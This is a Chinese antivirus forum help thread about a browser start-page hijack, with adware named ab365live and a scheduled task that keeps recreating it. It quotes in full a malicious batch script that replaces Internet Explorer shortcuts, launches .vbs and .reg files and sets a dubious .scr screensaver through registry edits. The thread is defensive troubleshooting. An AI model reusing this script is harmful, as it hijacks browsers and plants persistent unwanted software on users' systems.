瑞星卡卡安全论坛

程序名称：C:\WINDOWS\SYSTEM32\REG.EXE
修改 HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\START PAGE
  由 about:blank 修改为 http://www.net.cn.jiemei.xpdao.cn/blankblankblankblankblankblankblankblankblankblank.htm
用了瑞星没发现病毒. 360发现恶意插件ab365live清理不掉.任务管理器280+
指点哈``!!!!!

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )

附件: SREngLOG4.rar

:kaka10: :kaka10: 急急急

反病毒区求助，上传sreng日志。

这应该是一个历史记录，楼主的主页有没有被修改？
如果总是这样提示，可以给该键值设个权限
然后上传sreng日志

程序名称：C:\WINDOWS\SYSTEM32\REG.EXE
修改 HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\START PAGE
  由 about:blank 修改为 http://www.net.cn.jiemei.xpdao.cn/blankblankblankblankblankblankblankblankblankblank.htm
    前几天发过了.我自己简单处理以为没问题今天又是这情况.360发现恶意软件ab365live

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )

附件: SREngLOG5555.rar

@echo off
start zbhtzser.htm
regedit /s zbhtsert.reg
start zbhteiala.vbs
copy "Internet Explorer.lnk" "%userprofile%\桌面\Internet  Explorer.lnk" /y
copy "Internet Explorer.lnk" "%userprofile%\「开始」菜单\Internet  Explorer.lnk" /y
copy "Internet Explorer.lnk" "%userprofile%\「开始」菜单\程序\Internet  Explorer.lnk" /y
copy "Internet Explorer.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet  Explorer 浏览器.lnk" /y
copy "Internet Explorer.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet  Explorer.lnk" /y
copy "baobao.lnk" "%userprofile%\桌面\淘宝购物.lnk" /y
del "%userprofile%\桌面\IEXPLORE.lnk"
del "%userprofile%\桌面\IEXPLOREr.lnk"
del "%userprofile%\桌面\Internet Explorer.lnk"
del "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk"
del "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk"
@reg add "HKEY_CURRENT_USER\Control Panel\desktop" /v "SCRNSAVE.EXE" /t reg_sz /d C:\WINDOWS\system32\ucze.scr /f
@reg add "HKEY_CURRENT_USER\Control Panel\desktop" /v "ScreenSaveActive" /t reg_sz /d 1 /f
@reg add "HKEY_CURRENT_USER\Control Panel\desktop" /v "ScreenSaveTimeOut" /t reg_sz /d 60 /f
exit  这是什么???

去看看这个计划任务是什么。
==================================
计划任务
[已禁用] $~$Sys0$.job
        C:\WINDOWS\System32\rundll32.exe

    在哪里看???

就这东西一点就遭!!

控制面板里找你的计划任务，不是找那C:\WINDOWS\System32\rundll32.exe 文件。

那只是那计划任务要调用系统重要程序C:\WINDOWS\System32\rundll32.exe 工作而已

其工作起来的东西很可能就是启动cmd和reg的两程序的。

不知道什么叫计划任务，就百度嘛，立即可知

:kaka3: :kaka3: :kaka3: 禁止了得嘛 进不去....

禁止了得嘛 进不去.... ？？？？？？？

什么意思呢？？？

你去禁止什么了:kaka6:

从来没通过控制面板去查看计划任务。:kaka6:

开始－－程序－－附件－系统工具－计划任务

:kaka2: 电老有问题吗??

:kaka6: :kaka6: :kaka6:

要不你试试我置顶工具贴内找超级巡警删除工具，去删除下面文件

C:\WINDOWS\Tasks\$~$Sys0$.job

至于你看到的系统目录内的那两个不明批处理，也删除吧

能上传这个计划任务的文件么？

可以打包上传

或者上传病毒样本到可疑文件交流区，地址为：http://bbs.ikaka.com/showforum-20002.aspx
或者直接发送给瑞星的邮件服务中心【病毒样本】地址为：http://mailcenter.rising.com.cn/uploadnew.aspx

一个破计划任务，往你建议的地方传干虾米哟？？又不是病毒:kaka6:

哈哈哈 早点说这样说我都整好了!!扯啥子计划任务哦!真是的:kaka12: :kaka12:

就是那两个不明批处理搞的!!!!删了很多次了都没删掉!!

:kaka3: 哦 那删除就行了  我本来是打算看看任务内容是不是运行哪个文件

LZ按天月姐姐的步骤操作后，系统应该就没啥问题了，可以再扫描下日志传上来看看

？？？？？？

没看懂你说的什么，到底想说什么呢？

 
超级巡警删除工具 :kaka4: :kaka4: :kaka4: C:\WINDOWS\Tasks\$~$Sys0$.job删除失败!!

那两批处理如果文件名不变，可以删除后，创建个同名文件夹，试试看是否还能生成

关键就是得看那计划任务，就是那计划任务可能运行什么而创建那些东西的。

这问题很挠头，如果不是计划任务导致，可能很多扫描工具都扫描不到恶意启动那些批处理的程序行为了。我是无奈了

谢谢:kaka12: